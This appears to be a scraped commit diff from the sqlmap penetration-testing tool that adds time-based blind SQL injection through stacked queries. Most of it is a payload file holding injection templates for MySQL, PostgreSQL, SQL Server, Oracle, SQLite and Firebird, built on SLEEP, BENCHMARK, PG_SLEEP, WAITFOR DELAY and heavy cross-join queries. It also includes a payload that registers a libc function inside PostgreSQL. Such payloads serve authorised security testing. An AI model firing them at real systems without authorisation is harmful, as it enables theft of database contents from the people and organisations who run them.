Thanks to visit codestin.com
Credit goes to github.com

Skip to content

Commit f5ce739

Browse files
bdamelebdamele
committed
Added support for time-based blind SQL injection via stacked queries too. Need to add vectors for some DBMS yet.
1 parent 10ef2b5 commit f5ce739

3 files changed

Lines changed: 87 additions & 35 deletions

File tree

lib/request/inject.py

Lines changed: 5 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -413,8 +413,11 @@ def getValue(expression, blind=True, inband=True, error=True, time=True, fromUse
413413
value = __goInferenceProxy(expression, fromUser, expected, batch, resumeValue, unpack, charsetType, firstChar, lastChar)
414414
found = value or (value is None and expectingNone)
415415

416-
if time and kb.timeTest and not found:
417-
kb.technique = PAYLOAD.TECHNIQUE.TIME
416+
if time and (kb.timeTest or kb.stackedTest) and not found:
417+
if kb.timeTest:
418+
kb.technique = PAYLOAD.TECHNIQUE.TIME
419+
elif kb.stackedTest:
420+
kb.technique = PAYLOAD.TECHNIQUE.STACKED
418421

419422
while len(kb.responseTimes) < MIN_TIME_RESPONSES:
420423
_ = Request.queryPage(content=True)

lib/techniques/blind/inference.py

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -45,7 +45,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
4545
partialValue = ""
4646
finalValue = ""
4747
asciiTbl = getCharset(charsetType)
48-
timeBasedCompare = (kb.technique == PAYLOAD.TECHNIQUE.TIME)
48+
timeBasedCompare = (kb.technique in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED))
4949

5050
# Set kb.partRun in case "common prediction" feature (a.k.a. "good
5151
# samaritan") is used

xml/payloads.xml

Lines changed: 81 additions & 32 deletions
Original file line numberDiff line numberDiff line change
@@ -161,7 +161,7 @@ Tag: <test>
161161
SQL injections.
162162
163163
Sub-tag: <out-of-band>
164-
#TODO
164+
# TODO
165165
166166
Sub-tag: <details>
167167
Which details can be infered if the payload succeed.
@@ -172,7 +172,7 @@ Tag: <test>
172172
Sub-tags: <dbms_version>
173173
What is the database management system version (e.g. 5.0.51).
174174
175-
Sub-tags: <os>
175+
Sub-tags: <os>
176176
What is the database management system underlying operating
177177
system.
178178
@@ -1206,6 +1206,7 @@ Formats:
12061206
<risk>0</risk>
12071207
<clause>0</clause>
12081208
<where>1</where>
1209+
<vector>; IF(([INFERENCE]), SLEEP([SLEEPTIME]), [RANDNUM]);</vector>
12091210
<request>
12101211
<payload>; SELECT SLEEP([SLEEPTIME]);</payload>
12111212
<comment>#</comment>
@@ -1226,6 +1227,7 @@ Formats:
12261227
<risk>0</risk>
12271228
<clause>0</clause>
12281229
<where>1</where>
1230+
<vector>; IF(([INFERENCE]), BENCHMARK([SLEEPTIME]000000, MD5('[SLEEPTIME]')), [RANDNUM]);</vector>
12291231
<request>
12301232
<payload>; SELECT BENCHMARK([SLEEPTIME]000000, MD5('[SLEEPTIME]'));</payload>
12311233
<comment>#</comment>
@@ -1245,6 +1247,7 @@ Formats:
12451247
<risk>0</risk>
12461248
<clause>0</clause>
12471249
<where>1</where>
1250+
<vector>; SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END);</vector>
12481251
<request>
12491252
<payload>; SELECT PG_SLEEP([SLEEPTIME]);</payload>
12501253
<comment>--</comment>
@@ -1259,22 +1262,22 @@ Formats:
12591262
</test>
12601263

12611264
<test>
1262-
<title>PostgreSQL &lt; 8.2 stacked queries (heavy query)</title>
1265+
<title>PostgreSQL stacked queries (heavy query)</title>
12631266
<stype>4</stype>
1264-
<level>3</level>
1267+
<level>2</level>
12651268
<risk>0</risk>
12661269
<clause>0</clause>
12671270
<where>1</where>
1271+
<vector>; SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM GENERATE_SERIES(1, [SLEEPTIME]000000)) ELSE [RANDNUM] END);</vector>
12681272
<request>
1269-
<payload>; SELECT [RANDNUM] WHERE EXISTS(SELECT * FROM GENERATE_SERIES(1, [SLEEPTIME]000000));</payload>
1273+
<payload>; SELECT [RANDNUM] FROM GENERATE_SERIES(1, [SLEEPTIME]000000);</payload>
12701274
<comment>--</comment>
12711275
</request>
12721276
<response>
12731277
<time>[DELAYED]</time>
12741278
</response>
12751279
<details>
12761280
<dbms>PostgreSQL</dbms>
1277-
<dbms_version>&lt; 8.2</dbms_version>
12781281
</details>
12791282
</test>
12801283

@@ -1285,8 +1288,9 @@ Formats:
12851288
<risk>0</risk>
12861289
<clause>0</clause>
12871290
<where>1</where>
1291+
<vector>; SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM SLEEP([SLEEPTIME])) ELSE [RANDNUM] END);</vector>
12881292
<request>
1289-
<payload>; CREATE OR REPLACE FUNCTION sleep(int) RETURNS int AS '/lib/libc.so.6', 'sleep' language 'C' STRICT; SELECT sleep([SLEEPTIME]);</payload>
1293+
<payload>; CREATE OR REPLACE FUNCTION SLEEP(int) RETURNS int AS '/lib/libc.so.6', 'sleep' language 'C' STRICT; SELECT sleep([SLEEPTIME]);</payload>
12901294
<comment>--</comment>
12911295
</request>
12921296
<response>
@@ -1306,6 +1310,7 @@ Formats:
13061310
<risk>0</risk>
13071311
<clause>0</clause>
13081312
<where>1</where>
1313+
<vector></vector>
13091314
<request>
13101315
<payload>; WAITFOR DELAY '0:0:[SLEEPTIME]';</payload>
13111316
<comment>--</comment>
@@ -1325,6 +1330,7 @@ Formats:
13251330
<risk>0</risk>
13261331
<clause>0</clause>
13271332
<where>1</where>
1333+
<vector></vector>
13281334
<request>
13291335
<payload>; BEGIN DBMS_LOCK.SLEEP([SLEEPTIME]); END;</payload>
13301336
<comment>--</comment>
@@ -1344,6 +1350,7 @@ Formats:
13441350
<risk>0</risk>
13451351
<clause>0</clause>
13461352
<where>1</where>
1353+
<vector></vector>
13471354
<request>
13481355
<payload>; EXEC DBMS_LOCK.SLEEP([SLEEPTIME].00);</payload>
13491356
<comment>--</comment>
@@ -1363,6 +1370,7 @@ Formats:
13631370
<risk>0</risk>
13641371
<clause>0</clause>
13651372
<where>1</where>
1373+
<vector></vector>
13661374
<request>
13671375
<payload>; EXEC USER_LOCK.SLEEP([SLEEPTIME].00);</payload>
13681376
<comment>--</comment>
@@ -1382,6 +1390,7 @@ Formats:
13821390
<risk>0</risk>
13831391
<clause>0</clause>
13841392
<where>1</where>
1393+
<vector></vector>
13851394
<request>
13861395
<payload>; SELECT LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB([SLEEPTIME]0000000))));</payload>
13871396
<comment>--</comment>
@@ -1402,8 +1411,9 @@ Formats:
14021411
<risk>0</risk>
14031412
<clause>0</clause>
14041413
<where>1</where>
1414+
<vector></vector>
14051415
<request>
1406-
<payload>; SELECT COUNT(*) FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6;</payload>
1416+
<payload>; SELECT [RANDNUM] FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6;</payload>
14071417
<comment>--</comment>
14081418
</request>
14091419
<response>
@@ -1448,7 +1458,7 @@ Formats:
14481458
<where>1</where>
14491459
<vector>AND [RANDNUM]=IF(([INFERENCE]), BENCHMARK([SLEEPTIME]000000, MD5('[SLEEPTIME]')), [RANDNUM])</vector>
14501460
<request>
1451-
<payload>AND BENCHMARK([SLEEPTIME]000000, MD5('[SLEEPTIME]'))</payload>
1461+
<payload>AND [RANDNUM]=BENCHMARK([SLEEPTIME]000000, MD5('[SLEEPTIME]'))</payload>
14521462
</request>
14531463
<response>
14541464
<time>[DELAYED]</time>
@@ -1458,16 +1468,36 @@ Formats:
14581468
</details>
14591469
</test>
14601470

1471+
<test>
1472+
<title>PostgreSQL &gt; 8.1 AND time-based blind</title>
1473+
<stype>5</stype>
1474+
<level>2</level>
1475+
<risk>1</risk>
1476+
<clause>1,2,3</clause>
1477+
<where>1</where>
1478+
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
1479+
<request>
1480+
<payload>AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))</payload>
1481+
</request>
1482+
<response>
1483+
<time>[SLEEPTIME]</time>
1484+
</response>
1485+
<details>
1486+
<dbms>PostgreSQL</dbms>
1487+
<dbms_version>&gt; 8.1</dbms_version>
1488+
</details>
1489+
</test>
1490+
14611491
<test>
14621492
<title>PostgreSQL AND time-based blind (heavy query)</title>
14631493
<stype>5</stype>
1464-
<level>1</level>
1494+
<level>3</level>
14651495
<risk>1</risk>
14661496
<clause>1,2,3</clause>
14671497
<where>1</where>
1468-
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1, [SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
1498+
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM GENERATE_SERIES(1, [SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
14691499
<request>
1470-
<payload>AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1, [SLEEPTIME]000000))</payload>
1500+
<payload>AND [RANDNUM]=(SELECT [RANDNUM] FROM GENERATE_SERIES(1, [SLEEPTIME]000000))</payload>
14711501
</request>
14721502
<response>
14731503
<time>[DELAYED]</time>
@@ -1484,9 +1514,9 @@ Formats:
14841514
<risk>1</risk>
14851515
<clause>1,2,3</clause>
14861516
<where>1</where>
1487-
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7) ELSE [RANDNUM] END)</vector>
1517+
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7) ELSE [RANDNUM] END)</vector>
14881518
<request>
1489-
<payload>AND [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7)</payload>
1519+
<payload>AND [RANDNUM]=(SELECT [RANDNUM] FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7)</payload>
14901520
</request>
14911521
<response>
14921522
<time>[DELAYED]</time>
@@ -1522,9 +1552,9 @@ Formats:
15221552
<risk>1</risk>
15231553
<clause>1,2,3</clause>
15241554
<where>1</where>
1525-
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5) ELSE [RANDNUM] END)</vector>
1555+
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5) ELSE [RANDNUM] END)</vector>
15261556
<request>
1527-
<payload>AND [RANDNUM]=(SELECT COUNT(*) FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5)</payload>
1557+
<payload>AND [RANDNUM]=(SELECT [RANDNUM] FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5)</payload>
15281558
</request>
15291559
<response>
15301560
<time>[DELAYED]</time>
@@ -1561,9 +1591,9 @@ Formats:
15611591
<risk>1</risk>
15621592
<clause>1</clause>
15631593
<where>1</where>
1564-
<vector>AND [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6),[RANDNUM])</vector>
1594+
<vector>AND [RANDNUM]=IIF(([INFERENCE]),(SELECT [RANDNUM] FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6),[RANDNUM])</vector>
15651595
<request>
1566-
<payload>AND [RANDNUM]=(SELECT COUNT(*) FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6)</payload>
1596+
<payload>AND [RANDNUM]=(SELECT [RANDNUM] FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6)</payload>
15671597
</request>
15681598
<response>
15691599
<time>[DELAYED]</time>
@@ -1585,10 +1615,9 @@ Formats:
15851615
<risk>3</risk>
15861616
<clause>1,2,3</clause>
15871617
<where>2</where>
1588-
<!-- NOTE: =0 needs to stay or else MySQL goes nunners -->
1589-
<vector>OR IF(([INFERENCE]), SLEEP([SLEEPTIME]), [RANDNUM])=0</vector>
1618+
<vector>OR [RANDNUM]=IF(([INFERENCE]), SLEEP([SLEEPTIME]), [RANDNUM])</vector>
15901619
<request>
1591-
<payload>OR SLEEP([SLEEPTIME])=0</payload>
1620+
<payload>OR [RANDNUM]=SLEEP([SLEEPTIME])</payload>
15921621
</request>
15931622
<response>
15941623
<time>[SLEEPTIME]</time>
@@ -1602,13 +1631,13 @@ Formats:
16021631
<test>
16031632
<title>MySQL &lt; 5.0.12 OR time-based blind (heavy query)</title>
16041633
<stype>5</stype>
1605-
<level>3</level>
1634+
<level>4</level>
16061635
<risk>3</risk>
16071636
<clause>1,2,3</clause>
16081637
<where>2</where>
16091638
<vector>OR [RANDNUM]=IF(([INFERENCE]), BENCHMARK([SLEEPTIME]000000, MD5('[SLEEPTIME]')), [RANDNUM])</vector>
16101639
<request>
1611-
<payload>OR BENCHMARK([SLEEPTIME]000000, MD5('[SLEEPTIME]'))</payload>
1640+
<payload>OR [RANDNUM]=BENCHMARK([SLEEPTIME]000000, MD5('[SLEEPTIME]'))</payload>
16121641
</request>
16131642
<response>
16141643
<time>[DELAYED]</time>
@@ -1619,15 +1648,35 @@ Formats:
16191648
</test>
16201649

16211650
<test>
1622-
<title>PostgreSQL OR time-based blind (heavy query)</title>
1651+
<title>PostgreSQL &gt; 8.1 OR time-based blind</title>
16231652
<stype>5</stype>
16241653
<level>3</level>
16251654
<risk>3</risk>
16261655
<clause>1,2,3</clause>
16271656
<where>2</where>
1628-
<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1, [SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
1657+
<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
1658+
<request>
1659+
<payload>OR [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))</payload>
1660+
</request>
1661+
<response>
1662+
<time>[SLEEPTIME]</time>
1663+
</response>
1664+
<details>
1665+
<dbms>PostgreSQL</dbms>
1666+
<dbms_version>&gt; 8.1</dbms_version>
1667+
</details>
1668+
</test>
1669+
1670+
<test>
1671+
<title>PostgreSQL OR time-based blind (heavy query)</title>
1672+
<stype>5</stype>
1673+
<level>4</level>
1674+
<risk>3</risk>
1675+
<clause>1,2,3</clause>
1676+
<where>2</where>
1677+
<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM GENERATE_SERIES(1, [SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
16291678
<request>
1630-
<payload>OR [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1, [SLEEPTIME]000000))</payload>
1679+
<payload>OR [RANDNUM]=(SELECT [RANDNUM] FROM GENERATE_SERIES(1, [SLEEPTIME]000000))</payload>
16311680
</request>
16321681
<response>
16331682
<time>[DELAYED]</time>
@@ -1644,9 +1693,9 @@ Formats:
16441693
<risk>3</risk>
16451694
<clause>1,2,3</clause>
16461695
<where>2</where>
1647-
<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7) ELSE [RANDNUM] END)</vector>
1696+
<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7) ELSE [RANDNUM] END)</vector>
16481697
<request>
1649-
<payload>OR [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7)</payload>
1698+
<payload>OR [RANDNUM]=(SELECT [RANDNUM] FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7)</payload>
16501699
</request>
16511700
<response>
16521701
<time>[DELAYED]</time>
@@ -1682,9 +1731,9 @@ Formats:
16821731
<risk>4</risk>
16831732
<clause>1,2,3</clause>
16841733
<where>2</where>
1685-
<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5) ELSE [RANDNUM] END)</vector>
1734+
<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5) ELSE [RANDNUM] END)</vector>
16861735
<request>
1687-
<payload>OR [RANDNUM]=(SELECT COUNT(*) FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5)</payload>
1736+
<payload>OR [RANDNUM]=(SELECT [RANDNUM] FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5)</payload>
16881737
</request>
16891738
<response>
16901739
<time>[DELAYED]</time>
@@ -1721,9 +1770,9 @@ Formats:
17211770
<risk>3</risk>
17221771
<clause>1</clause>
17231772
<where>2</where>
1724-
<vector>OR [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6),[RANDNUM])</vector>
1773+
<vector>OR [RANDNUM]=IIF(([INFERENCE]),(SELECT [RANDNUM] FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6),[RANDNUM])</vector>
17251774
<request>
1726-
<payload>OR [RANDNUM]=(SELECT COUNT(*) FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6)</payload>
1775+
<payload>OR [RANDNUM]=(SELECT [RANDNUM] FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6)</payload>
17271776
</request>
17281777
<response>
17291778
<time>[DELAYED]</time>

0 commit comments

Comments
 (0)